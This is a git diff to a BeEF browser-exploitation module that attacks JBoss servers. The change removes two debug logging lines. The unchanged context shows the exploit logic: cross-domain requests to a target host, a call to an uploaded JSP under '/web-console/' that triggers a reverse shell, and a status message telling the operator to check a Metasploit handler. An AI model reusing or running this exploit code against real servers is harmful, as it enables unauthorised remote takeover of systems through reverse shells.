diff --git a/modules/network/jboss_jmx_upload_exploit/command.js b/modules/network/jboss_jmx_upload_exploit/command.js index ba2ea7d92..c09e15b89 100644 --- a/modules/network/jboss_jmx_upload_exploit/command.js +++ b/modules/network/jboss_jmx_upload_exploit/command.js @@ -19,11 +19,9 @@ beef.execute(function() { /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/ beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){ - console.log("jboss HEAD response code [" + response.status_code + "]"); if(response.status_code == "success"){ function triggerReverseConn(){ beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){ - console.log("jboss GET response code [" + response.status_code + "]"); if(response.status_code == "success"){ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); }else{